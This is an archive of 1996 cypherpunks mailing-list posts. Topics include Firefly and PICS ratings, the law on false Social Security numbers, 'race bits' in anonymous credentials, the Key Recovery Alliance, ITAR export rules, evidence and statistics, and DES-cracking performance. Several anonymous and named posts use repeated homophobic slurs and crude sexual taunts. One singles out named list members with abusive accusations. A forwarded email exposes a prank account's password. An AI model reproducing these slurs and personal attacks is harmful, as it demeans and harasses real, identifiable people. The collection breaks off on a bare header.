From: Dale Thorn <dthorn@gte.net>
Date: Fri, 13 Dec 1996 00:59:09 -0800 (PST)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Why PICS is the wrong approach
In-Reply-To: <199612130137.RAA10448@netcom13.netcom.com>
Message-ID: <32B11A3E.3304@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri wrote:
> >If Firefly is an example of what PICS is or could become, the hell with
> >PICS.  Firefly encourages and rewards group behavior and suppresses
> >individuality.  Firefly would reward the discussion of the latest album
> >by a Columbia or Capitol artist, and discourage discussion of material
> >from independent (real independent) labels.  I know because I've been
> >there and spent quite a bit of time trying to get a rating.

> this is absolutely ridiculous. the rating system is designed to
> be incredibly individualized. it uses sophisticated statistical
> techniques to find the correlations in your UNIQUE ratings given
> over a set of items with other people's ratings, and weighs
> future ratings based on these correlations. it may be even
> dealing with anti-correlations. in fact what you have, in effect,
> is a system with *no* hardwired ratings. the ratings space is
> different for *every*single*person* who uses the service.

As I said, I spent considerable time there, and typed in considerable
data.  I used the help facilities, and I corresponded with the persons
who do support.  Firefly was not able to make a single correlation or
suggestion for me, which BTW, Alexander Chislenko acknowledged as a
weakness of the (current/old) Firefly system.  Perhaps you should ask him
what the problem is, if you have a curiosity about it.

[snip]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Fri, 13 Dec 1996 01:15:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199612130915.BAA13307@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:42 AM 12/12/96 -0800, Red Rackham wrote:
>It seems to me that in the case of an employee giving the wrong number
>to his employer, the only person that suffers is the employee through
>loss of future payments from the Social Security Administration.  The
>employer certainly doesn't suffer.  Assume that the income tax is
>paid.
>
>What laws would an employee violate?  What are the chances of
>conviction?  What are the likely penalties if convicted?

26 USC 7205(a), "Any individual required to supply information to his 
employer under section 3402 who willfully supplies false or fraudulent 
information . . shall, in addition to any other penalty provided by law, 
upon conviction thereof, be fined not more than $1,000, or imprisoned not 
more than 1 year, or both."

42 USC 408(a)(7)(A), "Whoever for the purpose of obtaining (for himself or 
any other person) any payment or any other benefit to which he (or such 
other person) is not entitled, or for the purpose of obtaining anything of 
value from any person, or for any other purpose . . with intent to deceive, 
falsely represents a number to be the social security account number 
assigned by the Secretary to him or to another person, when in fact such 
number is not the social security account number assigned by the Secretary 
to him or to such other person . . shall be guilty of a felony and upon 
conviction thereof shall be fined under title 18 or imprisoned for not more 
than five years, or both." 

and 8 USC 1324a(b) requires that employers force employees to fill out a 
form to document citizenship status, and the form currently in use (INS I-9) 
requests a social security number.

- -- Catfish Friend 



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMrEM89GzuQsii+JdAQHc8wP/cKizciQHtI3ue/CdKJ62DbuPVlobRTl5
qY1oOQs3L3rb0mKa0FdklcfxaXYYMY0zJpGmGTSynDwJKGSCm5O6fPkCPG064LSp
npMzmOqOWpUSrYX652Q8EMFPODHKCl0FX78ksQ1ns8Xv//bT4wdPt5GR6AlTrvdc
XH1s/oB9tMM=
=2xtm
-----END PGP SIGNATURE-----




--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles@netbox.com         | 
http://www.io.com/~gbroiles | Export jobs, not crypto.
                            | 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Fri, 13 Dec 1996 02:24:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: [ADMINISTRATIVIUM] Zero-knowledge interactive proofs
Message-ID: <199612130931.BAA27741@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


In a jerk-off competition Tim Mayhem finishes second, third and 
fifth.

   \\\|||///
    =======
   | O   O | Tim Mayhem
    \`___'/
     _| |_





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jill014@aol.com
Date: Fri, 13 Dec 1996 02:18:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Elliptic curves
Message-ID: <961213051803_168116926@emout08.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-12-12 23:47:15 EST, nobody@zifi.genetics.utah.edu
(Anonymous) writes:

> Subj:	Re: Elliptic curves
>  Date:	96-12-12 23:47:15 EST
>  From:	nobody@zifi.genetics.utah.edu (Anonymous)
>  Sender:	owner-cypherpunks@toad.com
>  To:	cypherpunks@toad.com
>  
>  Admin@bexcol.demon.co.uk writes:
>  
>  > You are all a bunch of faggots. Faggot cannot be allowed on usenet as 
>  > dictated by the great dr. Grubor.
>  > 

Does dr. Grubor read this list?  I never see any postings from him here.
Just who is this anonymous poster; does anyone know or have any idea?

>  > Fuck you all.
>  
>  1. Cypherpunks is not on usenet.
>  
>  2. Faggots created and run Usenet, and there's nothing a pathetic,
>     powerless little boy like you can do about it.
>  

This is strange.  I mean, how do you know who is a faggot?  And is this
why you all are so sexist?  Are all of the faggots so sexist?  Just what is
it about these queers that makes them hate women so much anyway?
Are they jealous of us sexy women because their boyfriends may want us?
I have been watching this for a long time here, and this is a very perplexing
situation.  Just who are these faggots who "created and run Usenet?"
Can you give me a list of names?

>  3. I enjoy your pathetic little displays of despair about not having
>     any control over usenet.  Please keep whining to the mailing lists
>     to remind us all of what a pitiful little loser you are.
>  
Yes, but just who is he?  Do you know who he really is?  With all of
you guys always posting through these "nobody" addresses, you can 
not tell who is who?  I mean, how do you know that the anonymous poster
is in "despair about not having any control over usenet?"  Maybe he does
have control.  Just who has all of the Usenet control now anyway?

Please tell the faggots to stop being so sexist.

Jill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jill014@aol.com
Date: Fri, 13 Dec 1996 02:30:44 -0800 (PST)
To: tcmay@got.net
Subject: Re: Credentials without Identity--Race Bits
Message-ID: <961213052957_809296562@emout11.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-12-13 02:03:26 EST, cmcurtin@research.megasoft.com (C
Matthew Curtin) writes:

> Subj:	Re: Credentials without Identity--Race Bits
>  Date:	96-12-13 02:03:26 EST
>  From:	cmcurtin@research.megasoft.com (C Matthew Curtin)
>  Sender:	owner-cypherpunks@toad.com
>  Reply-to:	cmcurtin@research.megasoft.com
>  To:	tcmay@got.net (Timothy C. May)
>  CC:	cypherpunks@toad.com
>  
>  >>>>> "Tim" == Timothy C May <tcmay@got.net> writes:
>  
>  Tim> While it has been claimed by some that "crypto anarchy" means
>  Tim> that race won't matter, that cyberspace interactions will be
>  Tim> color-blind, this is misleading.
>  
>  Race bits, gender bits, etc., are all interesting possibilities. I
>  never thought about anyone wanting to do such a thing, but I suppose
>  that's likely.
>  
>  I've tended to think that as we become increasingly digital, issues
>  like race become less significant (perhaps because it generally isn't
>  immediately obvious in this medium). This doesn't mean that prejudices
>  go away, it means that they shift to stay with what is obvious. For
>  example, people who are unable to spell well (and don't spellcheck
>  email and usenet posts), or use excessively poor grammar are often
>  ridiculed for their lack of mastery of the language in which they're
>  writing. Basically, the prejudices and such continue with us, but
>  change, so as to remain based on things that are easily discernible.
>  
>  Tim> While many--probably most--users will care only for cyberspace
>  Tim> personna issues, and not meatspace personna issues of race,
>  Tim> color, height, weight, etc., this is not something built in to
>  Tim> anonymous transactions.
>  
>  As I'm replying, it's occurred to me that we've already got some sort
>  of persona "certificates" floating around now. (Such as the Geek
>  Code.) Imagine a field there to include race. Wouldn't take a lot to
>  do that, after all.
>  

What is the "Geek Code?"

>  Of course, the implementation of a race bit system that can be trusted
>  is another issue altogether. Would the White Boyz Club then need to
>  have its own trusted arbitrator to introduce people of the same race
>  to each other? (AryanSign?) Is a more elaborate PGP-style web
>  of trust used? Hmm.

So white Boyz Club excludes women to, is that correct?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jill014@aol.com
Date: Fri, 13 Dec 1996 02:33:09 -0800 (PST)
To: EALLENSMITH@ocelot.Rutgers.EDU
Subject: Re: Redlining
Message-ID: <961213053227_1355165508@emout08.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-12-13 02:36:46 EST, dthorn@gte.net (Dale Thorn) writes:

> Subj:	Re: Redlining
>  Date:	96-12-13 02:36:46 EST
>  From:	dthorn@gte.net (Dale Thorn)
>  Sender:	owner-cypherpunks@toad.com
>  To:	EALLENSMITH@ocelot.Rutgers.EDU (E. Allen Smith)
>  CC:	cypherpunks@toad.com
>  
>  E. Allen Smith wrote:
>  > From:   IN%"dthorn@gte.net"  "Dale Thorn" 12-DEC-1996 14:56:52.69
>  > >Actually, there is not only good evidence for the environmental
argument,
>  > >but you can reason it out yourself if you give attention to some things
>  > >that don't make it into most discussions on this topic.
>  
>  > Yes, there are strong arguments for the environment being the
determining
>  > factor. there are also strong arguments (such as interracial adoption 
> still
>  > leaving blacks below the average IQ of adopted siblings) for it being 
> genetics.
>  
>  It is possible to understand intelligence as "pattern matching" skills,
>  without having to have attendant math and statistics to define it more
>  precisely or clinically. This understanding (if you have it) is the key
>  to knowing that Black persons do *not* have less IQ than White persons,
>  regardless of the standardized tests.  Something I know about, as I've
>  scored in the top 1/1000 of one percent, etc.
>  

Are you black?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald, a remailer node)
Date: Fri, 13 Dec 1996 10:17:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Elliptic curves--hot stuff here
Message-ID: <199612131413.GAA06098@cypherpunks.ca>
MIME-Version: 1.0
Content-Type: text/plain


At 05:18 AM 12/13/96 -0500, my baby, Jill, wrote:

:Please tell the faggots to stop being so sexist.
:
:Jill
:
OK, all you faggots stop being so sexist.

:Just what is it about these queers that makes them hate women so much :anyway? Are they jealous of us sexy women because their boyfriends :may want us?

Oh, yea, and all you sexy hot AOL chicks stop turning on all the queers' boyfriends.

P.S.:

Jill, come up and see me sometime. I'm ready to start over if you are.

XXOO

Snookums






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald, a remailer node)
Date: Fri, 13 Dec 1996 10:15:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Credentials without Identity--Racey Bits
Message-ID: <199612131416.GAA06138@cypherpunks.ca>
MIME-Version: 1.0
Content-Type: text/plain


At 05:30 AM 12/13/96 -0500, Jill heatedly wrote:

:So white Boyz Club excludes women to, is that correct?

By definition, you steaming dreamboat.

Drop me a note, kitten.

XXOO

Snookums




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@research.megasoft.com>
Date: Fri, 13 Dec 1996 04:38:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Credentials without Identity--Race Bits
In-Reply-To: <961213052957_809296562@emout11.mail.aol.com>
Message-ID: <199612131231.HAA01689@goffette.research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Jill" == Jill014  <Jill014@aol.com> writes:

Jill> What is the "Geek Code?"

http://krypton.mankato.msus.edu/~hayden/geek.html

Jill> So white Boyz Club excludes women to, is that correct?

Just made that up ... could be any group that is interested in the
race, color, religion, sex, age, national origin (or anything else) of
those they're dealing with in cyberspace.

-- 
Matt Curtin  cmcurtin@research.megasoft.com  Megasoft, Inc   Chief Scientist
http://www.research.megasoft.com/people/cmcurtin/   I speak only for myself.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: PObox Adminstrator <pobox@pobox.org.sg>
Date: Thu, 12 Dec 1996 15:35:21 -0800 (PST)
To: spambo <>
Subject: Thank you for using PostOne service
Message-ID: <199612122334.HAA28828@plato.pobox.org.sg>
MIME-Version: 1.0
Content-Type: text/plain


Hi,
    Thank you for trying our PostOne service. The following account has 
been created for you:

    PObox Account: cypherwimps@post1.com
    Password:      XAp9hAd8eX

Please change your password as soon as you receive this e-mail.  To change 
your password, just login to PostOne at http://www.post1.com.

    The email associated with the id cypherwimps@post1.com is
    Name  : spambo 
    Email1: cypherpunks@toad.com
    Email2: 
    Email3: 

    Your account will be fully functional in no more than 3 hours (the
database on our servers are synchronized every three hours). If you
receive this email, you can be assured that your account has indeed been
created. You can test your own account by sending some email to
cypherwimps@post1.com to make sure it is working properly. 

    Please take note that PostOne service is currently in beta testing.
Some hiccups are expected as we go about enhancing it to provide you 
with a better service. Your feedback, comments and suggestions on the
service will be appreciated.

    We also have a mailing list (pobox-user@post1.com) where you can
join to discuss the development of PostOne. Major announcement will be sent
to the list too. Send an email to "majordomo@post1.com" with the
message body containing "subscribe pobox-user" to join this mailing list. 

    Please note that PostOne is more than just an email forwarding service.
We also provide other Email/WWW related services too. For more information 
on PObox service, please check out the URL http://www.post1.com.

    Please feedback to us if you encounter problems using our service.


- Your friendly PostOne Adminstrator (pobox@post1.com)

ps: From the FAQ at http://www.post1.com/about/pfaq.html

-- CUT HERE --
Q: Help! The password given to me doesn't seem to work! 

A: Please take note of the following when you are logging in to PObox. 

   1.The userid is just plainly the PostOne username, without the 
     @post1.com. Eg, if your pobox address is joe@post1.com, you will 
     login simply as joe. 
   2.Passwords issued are cAsE sEnSiTiVe. 
-- CUT HERE --





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 13 Dec 1996 10:15:14 -0800 (PST)
To: Jill014@aol.com
Subject: Re: Elliptic curves
In-Reply-To: <961213051803_168116926@emout08.mail.aol.com>
Message-ID: <32B17A10.45E2@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Jill014@aol.com wrote:
[snip]
> >  > You are all a bunch of faggots. Faggot cannot be allowed on usenet as
> >  > dictated by the great dr. Grubor.

> Does dr. Grubor read this list?  I never see any postings from him here.
> Just who is this anonymous poster; does anyone know or have any idea?

Somebody knows, but they're not gonna tell.  The good news is, they don't
send much of anything to the list, except every now and then when someone
presses one of their buttons.

> This is strange.  I mean, how do you know who is a faggot?  And is this
> why you all are so sexist?  Are all of the faggots so sexist?  Just what is
> it about these queers that makes them hate women so much anyway?
> Are they jealous of us sexy women because their boyfriends may want us?
> I have been watching this for a long time here, and this is a very perplexing
> situation.  Just who are these faggots who "created and run Usenet?"
> Can you give me a list of names?

It's interesting that men, whether they are gay or otherwise, share a
lot of things in common.  Actually, I've always thought that most
heterosexual men don't really like women all that much, beyond having
someone to dominate and use sexually.  I know I could get yelled at for
saying that, but if straight men *really* liked women, they'd show more
empathy and understanding toward them.  I'm into music a lot (indie-pop),
and most men I know wouldn't even consider listening to most girl-groups.
Wouldn't it be a nicer world if, when you see a lot of these guys
cruising down the street in their car with the radio booming out some
male-oriented rap song, if every now and then they'd mix in some
female artists?

[snip remainder]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 13 Dec 1996 04:54:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: KRA_gak
Message-ID: <1.5.4.32.19961213125042.00690070@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 12-12-96

 "High-Tech Leaders to Facilitate Recovery of Encrypted
 Information Globally. Key Recovery Alliance Welcomes 29 
 New Members"

 The key recovery alliance has more than tripled its membership 
 and identified its charter objectives.

 + expediting the widespread, global use of strong encryption 

 + evaluating technologies that are flexible and scaleable to meet
 various changing commercial needs and policies 

 + promoting interoperability between different key recovery and 
 non-key recovery solutions 

 + defining a commercial infrastructure for worldwide development 
 of strong encryption 

 + maximizing security for business

 To facilitate meeting these and other objectives, the alliance
 identified a series of working committees targeted to meet within
 the next 60 days. Soon after this 60-day period, the now
 40-member alliance will re-convene to mark the progress of these
 committees and to identify future benchmarks and deliverables.

 The new members of the alliance are: America Online, Inc.,
 Certicom, Compaq Computer Corporation, CygnaCom Solutions,
 Inc., Cylink Corporation, Data Securities International, Inc., 
 First Data Corporation, Digital Signature Trust Company, Gradient
 Technologies, Inc., ICL, McAfee, Mitsubishi Corporation of
 Japan, Motorola, Mytec Technologies, Inc., Network Systems
 Group of StorageTek, Nortel, Novell, Inc., PSA, Price
 Waterhouse, Racal Data Group, Rainbow Technologies, SafeNet
 Trusted Services Corporation, Secure Computing, SourceFile,
 Sterling Commerce, Telequip, Unisys, Utimaco Mergent, and
 VPNet Technologies.


 "IBM SecureWay Framework To Accelerate Growth of Electronic
 Business"

 IBM announced a new framework which will advance secure 
 electronic business by making it possible for diverse security 
 offerings to work together. The IBM SecureWay Key Management 
 Framework will let businesses use encryption products 
 interchangeably.

 The new framework will provide for the easy adoption of new
 and existing key recovery technologies, while not disturbing
 existing cryptographic and other security functions and
 operations. It will effectively isolate the application from the
 unique properties of a specific key recovery implementation.

 A white paper describing the SecureWay Key Management
 Framework is available at http://www.ibm.com/security

-----

KRA_gak  (19 kb)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Thu, 12 Dec 1996 22:54:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Meeting] Cypherpunks wanking club.
Message-ID: <199612130654.HAA23835@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


There will be a meeting at my place for all cypherpunks so we can pull
each other dicks about how clever we are and bag all those non-entities
who aren't. All gun lovers are of course welcome and we can exhibit our
manhood paranoia by seeing who has the biggest calibre weapon. Having a
deadly weapon after all proves we are grown up, right kiddies.

Sufferin' Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Fri, 13 Dec 1996 05:44:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Elliptic curves
In-Reply-To: <1uJVyD160w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.95.961213083438.4542A-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> >From cypherpunks-errors@toad.com  Fri Dec 13 00:43:05 1996
> Received: by bwalk.dm.com (1.65/waf)
> 	via UUCP; Fri, 13 Dec 96 01:34:42 EST
> 	for dlv
> Received: from toad.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
>         id AA22158 for cypherpunks; Fri, 13 Dec 96 00:43:05 -0500
> Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id TAA05349 for cypherpunks-outgoing; Thu, 12 Dec 1996 19:07:54 -0800 (PST)
> Received: from zifi.genetics.utah.edu (zifi.genetics.utah.edu [155.100.229.31]) by toad.com (8.7.5/8.7.3) with ESMTP id TAA05344 for <cypherpunks@toad.com>; Thu, 12 Dec 1996 19:07:47 -0800 (PST)
> Received: (from bin@localhost) by zifi.genetics.utah.edu (8.8.3/8.6.9) id UAA13495 for cypherpunks@toad.com; Thu, 12 Dec 1996 20:07:52 -0700
> Date: Thu, 12 Dec 1996 20:07:52 -0700
> Message-Id: <199612130307.UAA13495@zifi.genetics.utah.edu>
> To: cypherpunks@toad.com
> From: nobody@zifi.genetics.utah.edu (Anonymous)
> Comments: Please report misuse of this automated remailing service to <complaints@zifi.genetics.utah.edu>
> References: <850408570.510393.0@bexcol.demon.co.uk>
> Subject: Re: Elliptic curves
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> Admin@bexcol.demon.co.uk writes:
> 
> > You are all a bunch of faggots. Faggot cannot be allowed on usenet as 
> > dictated by the great dr. Grubor.
> > 
> > Fuck you all.
> 
> 1. Cypherpunks is not on usenet.
> 

The fuck it ain't.  They are at least two newsgroups out there
that carry every piece of e-mail that goes to the cypherpunks list.

> 2. Faggots created and run Usenet, and there's nothing a pathetic,
>    powerless little boy like you can do about it.
> 

This may be true, up until now, but the faggots are now getting
kicked off of the new UseNet.  There are just TOO MANY faggots
like Peter Berger and Tim May and John Gilmore runnung around
to allow this faggot subculture to continue.

> 3. I enjoy your pathetic little displays of despair about not having
>    any control over usenet.  Please keep whining to the mailing lists
>    to remind us all of what a pitiful little loser you are.
> 
These faggot cypherpunks are not worth wasting your time on,
unless you are ready to take their fucking ass to court and
cross-examine them.

ARE YOU A FAGGOT, Peter Berger? -- ANSWER THE QUESTION !!!

(The faggots must answer this question when you get them on the
stand.)

That Tim Skirvin is also a faggot, so I have been told by
his schoolmates.  Has he been fucked in the ass by anybody
on this list?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rob Carlson" <robc@xmission.com>
Date: Fri, 13 Dec 1996 10:14:25 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: Re: In Defense of Anecdotal Evidence
Message-ID: <199612131649.JAA24217@mail.xmission.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 12 Dec 1996 14:12:23 -0800, Huge Cajones Remailer wrote:
>Statistics are a useful tool, but they have their problems.  Their
>accuracy is often in doubt.  Most scientific data comes with an error
>analysis so you can tell what the figure means.  For some reason
>statisticians never do this so we cannot tell whether their numbers
>are accurate to within 0.1%, 1.0%, 10%, or even worse.
>
>There are many other problems.  For instance, users of statistics
>assume they have a random sample, even in cases where that is far from
>clear

[ List of other problems deleted ]

Of course, anecdotal evidence also suffers from all of these problems. And
in greater magnitude. This is true since it is a special case of statistical
evidence. With a non-random sample set of one and no controls for
observer bias.


>The advantage of first hand experience is that it is primary evidence.
>You know it's true because you were there and saw it.

I have seen women cut in half and rabbits made to appear in an
empty hat with my own eyes. I'm quite sure neither of these is true.
Humans are poor observers. The data processing unit is easily
fooled. Many people make a living off of this fallability such as 
magicians and politicians. 

The observer is also tainted by previous experience(or lack of) and individual
needs. This leads to bias unavoidable in even the most honest and
reliable observers. Statistical methods are used to control for this. 
Double-blind techniques are one example. Humans also have a need
to make conclusions when insufficient evidence is available. Witness
the number of people who have an opinion on the innocence of OJ
Simpson based on <2 minutes/day condensation of the evidence.


>The advantage of anecdotal evidence (in the sense we have been using
>it) is that the person who is telling you the anecdote was there and
>saw it.  You can cross-examine them and get a full understanding of
>the evidence provided.

The reporting of evidence involves different issues. If you want to 
believe that women are actually cut in two or that politicians are telling 
the truth anytime their lips are moving, thats one thing. If you want to tell 
me its true because you personally observed it, thats quite another. Given
the failures of humans as observational tools, your story is unverifiable by
me. Perhaps through effective cross examination I can prove you wrong, but
I can never prove you right with such a technique.That will require other
evidence outside the control of the observer ( statistical is just one available ).

Evidence that can be verified independently by many observers increases the
reliability. Experiments and polls can be done by me thus eliminating your bias.
Independent verification can also check for errors and check the parameters
under which the evidence is true. Studies are done with certain assumptions
and controls. The evidence loses its reliability when removed from this context.

This doesn't make studies or statistical evidence true. Just more reliable than
anecdotal evidence. Humans who will lie about their observations will also produce
flawed studies. Again the former (anecdotal) is unverifiable, but I can check the 
latter (statistical) independently. I also don't believe polls can be used to determine 
the truth. They can only tell what a mass of people believe. And then only if done 
correctly.

To make this on topic, how does this apply to cryptography and crypto-politics? This 
issue is a foundation of our discussions here. Shall we accept anecdotal evidence
such as the "If you only knew what we knew" arguments? What is more reliable: IPG's
claims that their product is an OTP because they say it is or Bruce Schneier's book that
can be used to point out the fallacy's in their claims?

Relying on anecdotal evidence makes you susceptible to the magicians of the world. The honest
ones use mirrors and their need is to entertain you enough to get your money. The rest use
anecdotal evidence and emotional arguments (verbal misdirection?). Their needs are left as a
test of the reader's naivete.

Rob Carlson <robc@xmission.com>













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 13 Dec 1996 10:15:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: ASM vs portable code [WAS: Re: Java DES breaker?]
Message-ID: <199612131459.GAA06660@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Arachelian <sunder@brainlink.com> wrote:
> On Wed, 11 Dec 1996, Dr.Dimitri Vulis KOTM wrote:
> 
> > I happen to have a Sparc 20 box and a Linux box and a SCO box, and ActiveX
> > won't work on any of those. I also work with a bunch of other equipment
> > that's much faster than a PC, but doesn't run browsers. (Most of it is not
> > connected to the 'net for security reasons, but that's besides the point.)
> 
> Right, and Active X, if those machies were on the web, would not be 
> supported.
>  
> > If Bill's client is sure to run the platforms that MS IE runs on, then this is
> > not a consideration.
> 
> Correct, however there is one thing you have forgotten... (next paragraph)
> 
> > Interpreted FORTH bytestream (which is what Java is) may be "doing quite well"
> > when drawing GUI gizmos and widgets, but it can't get anywhere near the
> > performance of hand-optimizer assembler that you can stick into ActiveX.
> 
> While ActiveX does support hand optmized assembler, there are Java 
> JustInTime compilers which take JVM bytecodes and turn'em into raw 
> assembler.  They aren't hand optimized, they are natively compiled code, 
> but they are native code non the less.  A good optimizing compiler may 
> not be 100% as cool and as fast as hand optmized code, BUT it'll be 
> almost as fast.  And Java will run on just about EVERY platform out there.
> And that is a bigger, more important point than a 10%-25% increase in 
> power over non-optimized code.
> 
> Besides, I'm not arguing AGAINST an ActiveX client, there's no reason 
> why there can't be both Java and ActiveX clients out there since there is 
> both a compatibilty issue and a speed increase with ActiveX.

While I'm reluctant to ever find myself in the same corner as
Vulis, he has a point. As one of the few folks on this list who
actually writes code, I say that hand-optimized assembler will
beat machine generated code every time.

I have figures to back me up.

As some of you know, I've been working on a DES key recovery tool.
I'm have both portable C and x86 assembler versions. They
are currently identical, except that the guts of the DES round is 
written in "C" in one, and hand-optimized Pentium assembler in 
the other. 

For this test, I modified the code to cut out the delays associated 
with incrementing the key schedule, leaving the most of the 
crunching in the DES decryption. Both versions were compiled 
under Visual C++ 4.0, with Optimizations set to 'Maximize speed', 
and inlines to 'any suitable', and run on a 90MHz Digital 
Celebris 590 under WinNT 3.51.

Averaging several runs:

"C":   102,300 crypts/sec
ASM:   238,000 crypts/sec

With Java, it's possible to add native code methods to the 
interpreter, though this requires extra work by the user - 
it's harder than 'click on this link to run my reely 
kool applet'. This violates the Java sandbox, and requires 
the user to  make trust decisions on the methods they 
are adding.

ActiveX lets you add and run native code with a click, but
again involves trust decisions.

My philosophy is 'the more the merrier'. I'd like to see
people work on DES Key Recovery on a large number
of platforms - we just need to standardize on the input
and output formats.

Peter Trei
trei@process.com     

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 13 Dec 1996 10:17:10 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: ITARs effects
Message-ID: <199612131507.KAA27336@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


I cross posted the ITAR proposed rev pointers to Firewalls.  In
addition to an entertaining rant, Marcus posted this:

----- Forwarded message from Marcus J. Ranum -----

>From mjr@mail.clark.net  Thu Dec 12 17:38:57 1996
Message-Id: <199612122240.RAA10556@mail.clark.net>
Comments: Authenticated sender is <mjr@mail.clark.net.>
From: "Marcus J. Ranum" <mjr@mail.clark.net>
Organization: V-ONE Corp Baltimore office
To: adam@homeport.org
Date: Thu, 12 Dec 1996 17:42:00 +0000
Subject: that doc....
Priority: normal
X-mailer: Pegasus Mail for Win32 (v2.42a)


You posted a pointer to that document. It was quite interesting.
I see that the feds are making INDIVIDUALS responsible for
ENFORCING export laws!!!  Read carefully:

(9) Export of encryption software. The export of encryption source
code and object code software controlled for EI reasons under ECCN
5D002 on the Commerce Control List (see Supplement No. 1 to part 774
of the EAR) includes downloading or causing the downloading, of such
software to locations (including electronic bulletin boards and
Internet file transfer protocol and World Wide Web sites) outside the
U.S., and making such software available for transfer outside the
United States, over radio, electromagnetic, photo optical, or
photoelectric communications facilities accessible to persons outside
the United States, including transfers from electronic bulletin boards
and Internet file transfer protocol and World Wide Web sites, or any
cryptographic software subject to controls under this regulation
unless the person making software available takes precautions as
adequate to prevent unauthorized transfer of such code outside the
United States. This provision applies both to the uploading and
downloading of such software. For purposes of this paragraph, the
following shall constitute adequate precautions to prevent
unauthorized transfer: 

This implies that putting something up for FTP == export. Holy
shit.

mjr.
-----
Marcus J. Ranum, Chief Scientist, V-ONE Corporation
Work:       http://www.v-one.com
Personal:   http://www.clark.net/pub/mjr
"I'll have time to be laid back when I'm laid out on a slab"

----- End of forwarded message from Marcus J. Ranum -----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 13 Dec 1996 10:15:21 -0800 (PST)
To: jya@pipeline.com (John Young)
Subject: Re: KRA_gak
In-Reply-To: <1.5.4.32.19961213125042.00690070@pop.pipeline.com>
Message-ID: <199612131510.KAA27361@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
|  The key recovery alliance has more than tripled its membership 
|  and identified its charter objectives.

|  + promoting interoperability between different key recovery and 
|  non-key recovery solutions 

	Isn't this in direct conflict with one of NIST's criteria?

|  + defining a commercial infrastructure for worldwide development 
|  of strong encryption 
| 
|  + maximizing security for business

	Isn't this in direct conflict with the FBI's criteria? ;)

|  To facilitate meeting these and other objectives, the alliance
|  identified a series of working committees targeted to meet within
|  the next 60 days. Soon after this 60-day period, the now
|  40-member alliance will re-convene to mark the progress of these
|  committees and to identify future benchmarks and deliverables.

	Did they identify the committees, or announce that they will
exist?

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 13 Dec 1996 10:15:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Whom can you trust with your keys -- government version
